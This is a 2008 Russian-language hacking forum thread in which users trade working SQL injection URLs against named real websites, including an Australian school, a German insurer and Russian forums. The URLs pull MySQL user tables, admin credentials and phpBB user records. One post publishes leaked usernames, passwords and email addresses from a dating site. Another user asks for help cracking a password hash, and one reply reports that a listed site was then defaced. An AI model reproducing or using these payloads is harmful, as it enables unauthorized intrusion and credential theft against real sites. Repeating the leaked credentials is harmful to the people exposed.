09.06.2008, 18:21
|
|
Познающий
Регистрация: 06.08.2007
Сообщений: 85
С нами:
9875274
Репутация:
91
|
|
Код:
http://www.hrv-club.ru/articles.php?m=opit'+UNION+SELECT+1,user,3,4,5,6,7,8+FROM%20mysql.user/*
Код:
http://www.hrv-club.ru/articles.php?m=opit'+UNION+SELECT+1,password,3,4,5,6,7,8+FROM%20mysql.user/*
Код:
http://www.hrv-club.ru/articles.php?m=opit'+UNION+SELECT+1,concat_ws(0x3A,table_schema,TABLE_NAME),3,4,5,6,7,8+FROM%20INFORMATION_SCHEMA.TABLES/*
А вот к форумной бд хз как подойти. Форум ломается обычным сплоитом и админы этого форума присутсвуют еще на 10 других, и везде админка форума защищена какойто дрянью... Мне кажется это "сеть" форумов 
Если вдруг комуто очень надо будет, дам админский пасс, чтобы не ломились непонятные люди на форум и неписали какие они крутые кулхацкеры =/ |
|
|
09.06.2008, 18:59
|
|
Участник форума
Регистрация: 15.05.2008
Сообщений: 166
С нами:
9467906
Репутация:
128
|
|
Один очень симпатичный еврейский институт(никакой розьни  )
www.shalom.edu.au
Домен в зоне .edu (образование)
Бажный линк:
Код HTML:
http://www.shalom.edu.au/contentPage.php?id=-139+union+select+1,2,version(),4/**/&parentId=1'
До конца доводить не решил(влом),но базовые данные выложу:
PHP код:
база данных: shalom_shalom (уже смешно :) )
юзер: shalom_limmudozD@localhost (шас описаюсь )))
версия: 4.1.22-standard-log
Между прочим у них очень красивые фотки и СОВСЕМ не фильтрующиея знаки..
Последний раз редактировалось fatalo; 09.06.2008 в 19:01..
|
|
|
|
09.06.2008, 21:52
|
|
Познающий
Регистрация: 06.08.2007
Сообщений: 85
С нами:
9875274
Репутация:
91
|
|
Hande hoch! Gitler kaput! Ich bin bose!
Код:
http://www.fulde-versicherungen.de/efnews/index.php?shownews=2'+UNION+SELECT+1,2,username,4,pwd,6,7,8,9,10,11,12+FROM+ef01pfuser/*
|
|
|
|
09.06.2008, 22:03
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
С нами:
10263663
Репутация:
1559
|
|
RANX.ru Знакомства по фотографиям! Без громоздких анкет!
http://ranx.ru/?showFoto=-1+union+select+1,2,concat_ws(0x3a,name,password,em ail),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+user s/*
Андрей  as$w0rd:info@ranx.ru - админ
Антон:ranx.ru:myxolove@mail.ru
ГУЛЬНАРА:timeryn04:gulyaniz@mail.ru
пароли были в Base64  |
|
|
|
09.06.2008, 22:23
|
|
Новичок
Регистрация: 11.05.2008
Сообщений: 12
С нами:
9473814
Репутация:
5
|
|
ребята кто поможет с хешем $1$AOOiO7Zi$2he3AqhhFU8197ojSz9bn/
очень срочно нада базы непринимают пишут что некоректный но он таков и нада както его росшифравать сменя +++
|
|
|
|
09.06.2008, 22:41
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
эта тема для скулей. тебе сюда http://forum.antichat.ru/showthread.php?p=585987 пост #2464.
|
|
|
|
10.06.2008, 10:15
|
|
Познающий
Регистрация: 06.08.2007
Сообщений: 85
С нами:
9875274
Репутация:
91
|
|
Код:
http://www.donny.co.uk/rovers/news.php?ID=-57+union+select+1,admin_id,3,4,5,6,admin_email,admin_pass,9,10,11+from+zenadmin/*
В information_schema.tables подглядел еще таблицы:
forums2_acl_users
phplist_rssitem_user
phplist_user_user
ttrss_users
Чтоб просмотреть их колонки надо будет зашифровать в hex.(Спасибо тохе )
Код:
http://www.parkui.ru/news.php?id=-57+union+select+1,2,3,4,5,username,7,user_password,user_email,10+from+phpbb_users+limit+1,1/*
Последний раз редактировалось SUBJECT617; 10.06.2008 в 10:46..
Причина: yables...
|
|
|
|
10.06.2008, 15:38
|
|
Постоянный
Регистрация: 16.01.2006
Сообщений: 598
С нами:
10692326
Репутация:
531
|
|
Сообщение от SUBJECT617
http://www.parkui.ru/news.php?id=-57+union+select+1,2,3,4,5,username,7,user_password ,user_email,10+from+phpbb_users+limit+1,1/*
Hacked by [WSWW] teAm
cупер хекеры мля =\ умно смотреть ачат а потом дефить
|
|
|
|
10.06.2008, 17:07
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
NFM, SUBJECT617,
вот верная таблица форума:
http://www.parkui.ru/news.php?id=-17+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,usern ame,user_password),9,10+from+park_phpbb_users+limi t+1,1/*
Последний раз редактировалось sabe; 10.06.2008 в 17:15..
|
|
|
|
10.06.2008, 18:15
|
|
Новичок
Регистрация: 29.05.2008
Сообщений: 12
С нами:
9447845
Репутация:
11
|
|
http://untp.kiev.ua/test.php?id=1%20UNION%20ALL%20SELECT%201,2,databas e(),4,psevdo,6%20from%20pages%20%20/*
MySQL 4.0.27 
но таблицу подобрал только одну да и то вряд ли полезную (да и колонки впадло подбирать)
http://untp.kiev.ua/adminka/
знать бы еще куда она смотрит
там же есть IPB, но его таблицы тоже не нашел
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
